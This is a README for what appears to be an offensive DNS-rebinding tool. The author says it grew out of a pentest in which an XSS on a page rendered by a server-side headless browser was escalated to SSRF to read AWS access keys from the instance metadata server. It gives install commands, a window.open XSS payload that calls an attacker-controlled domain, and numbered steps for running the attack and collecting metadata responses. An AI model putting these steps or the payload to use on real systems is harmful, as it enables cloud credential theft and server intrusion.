This tool was originally developed years ago to pentest a company. The target had an XSS vulnerability that was escalated to a Server-Side Request Forgery (SSRF) because the vulnerable webpage was being opened in a headless browser on one of the company's servers. To increase the severity of my vulnerability report, I combined the SSRF with DNS rebinding to access and read AWS access keys from the instance metadata server.

For a similar case, see this video.

Install and run

sudo systemctl stop systemd-resolved # systemd-resolved uses port 53
npm i
sudo npm start

How to use this tool

1. Host this tool somewhere with a dedicated static IP address
2. Buy a domain name and assign the IP address to it. For demonstration purposes, let's assume you bought the domain example.com.
3. Trigger an XSS vulnerability on a webpage that is opened in a headless web browser on the target server. Use the XSS to open http://sub0.example.com/rebind.html in a new tab of the headless browser using: window.open("http://sub0.example.com/rebind.html", "_blank");
4. Wait about a minute. You should see Triggered: true on the http://example.com/admin page.
5. After Triggered: true appears, wait approximately three more minutes. In the Logs section, you should see a response from the AWS metadata server.